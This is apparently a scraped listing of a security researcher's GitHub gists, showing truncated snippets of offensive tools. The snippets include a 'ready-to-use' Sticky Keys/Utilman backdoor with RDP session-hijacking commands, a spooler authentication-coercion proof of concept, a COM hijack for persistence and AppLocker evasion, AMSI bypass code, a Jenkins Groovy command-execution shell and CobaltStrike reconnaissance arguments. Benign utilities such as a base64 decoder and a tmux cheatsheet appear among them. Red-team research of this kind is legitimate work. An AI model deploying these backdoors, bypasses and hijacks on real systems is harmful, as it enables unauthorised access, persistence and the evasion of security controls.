Offensive Sencha Consultant

Mariusz B. mgeeky

mgeeky / Decode-Base64.ps1
Last active Jun 20, 2019
Base64 decode in PowerShell
function Decode-Base64Ascii ($data) {
$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
$ss = "[^" + $chars + "=]"
$data = $data -replace $ss, ""
$pad = ""
$r = ""
if (($data[$data.Length - 1]) -eq '=') {
if (($data[$data.Length - 2]) -eq '=') {
$pad = "AA"
mgeeky / sethc-utilman-backdoor.bat
Last active Jun 19, 2019
Ready-to-use Utilman and Sethc (Sticky Keys) backdoor script. Deadly when used with the "Password-less RDP Session Hijacking" trick
@echo off
REM Backdoors sethc.exe (Sticky keys) and utilman (Win+U) in order to easily get past
REM Windows logon screen (GINA). These processes will launch as SYSTEM. We can then use the
REM technique dubbed "Password-less RDP Session Hijacking", by doing:
REM (parameters to tscon needs to be adjusted)
REM C:\> query user
REM C:\> sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console"
REM C:\> net start sesshijack
mgeeky /
Created Jun 14, 2019 — forked from 3xocyte/
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer:
# some code from
import os
import sys
import argparse
import binascii
import ConfigParser
mgeeky /
Created Jun 14, 2019 — forked from lanmaster53/
Burp Python Scripter scripts
from burp import IScanIssue
class CustomIssue(IScanIssue):
def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
self.HttpMessages=[BasePair] # list of HTTP Messages
self.HttpService=BasePair.getHttpService() # HTTP Service
self.Url=BasePair.getUrl() # Java URL
self.Confidence = Confidence # "Certain", "Firm" or "Tentative"
self.IssueBackground = IssueBackground # String or None
self.IssueDetail = IssueDetail # String or None
mgeeky / slmgr-com-hijack.reg
Last active Jul 13, 2019
Example presenting how to hijack the COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade command-line logging and AppLocker
Windows Registry Editor Version 5.00
mgeeky / Disable-Amsi.ps1
Last active Jun 14, 2019
Three most recent hash-lookup-based AMSI bypasses; techniques 1 and 3 work at the moment (13.06.2019).
#requires -version 5
function New-InMemoryModule
[Parameter(Position = 0)]
$ModuleName = [Guid]::NewGuid().ToString()
mgeeky /
Created May 28, 2019
One-liner that lists all S3 buckets across all regions and dumps each bucket's policy to a JSON file.
P=aws-profile; for region in `aws ec2 describe-regions --output text | cut -f3`; do for bucket in `aws --region $region --profile $P s3api list-buckets --query 'Buckets[*].Name' --output text | tr '\t' '\n'`; do aws --profile $P --region $region s3api get-bucket-policy --bucket $bucket --query 'Policy' --output text 2> /dev/null | jq '.' | tee $P-$bucket.json ; done ; done
mgeeky / tmux-cheatsheet.markdown

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
mgeeky / cobaltstrike-argue-powershell.txt
Created Apr 26, 2019
CobaltStrike's argue command with parameters for "powershell" command.
argue powershell Get-WmiObject -Class ccm_application -Namespace root\ccm\clientsdk -ComputerName (get-content C:\Windows\System32\drivers\etc\hosts) | Where-Object { ($_.InstallState -ne "Installed") -and ($_.ApplicabilityState -eq "Applicable") -and ($_.IsMachineTarget -eq $True) -and ($_.EvaluationState -ne 1)} | select FullName,__SERVER ; Get-WMIobject win32_networkadapterconfiguration | where {$_.IPEnabled -eq "True"} | Select-Object pscomputername,ipaddress,defaultipgateway,ipsubnet,dnsserversearchorder,winsprimaryserver | format-Table -Auto ; Get-EventLog -log system -newest 1000 | where-object {$_.eventid -eq '1074'} | format-table machinename, username, timegenerated -autosize
mgeeky / jenkins-groovy-script-shell.txt
Last active Jun 21, 2019
Jenkins Groovy shell-providing script. To be used after authenticating to http://IP:Port/script
def shell(String command) {
println command
def process = new ProcessBuilder(addShellPrefix(command))
.directory(new File('user.dir'))
process.inputStream.eachLine {println it}
return process.exitValue()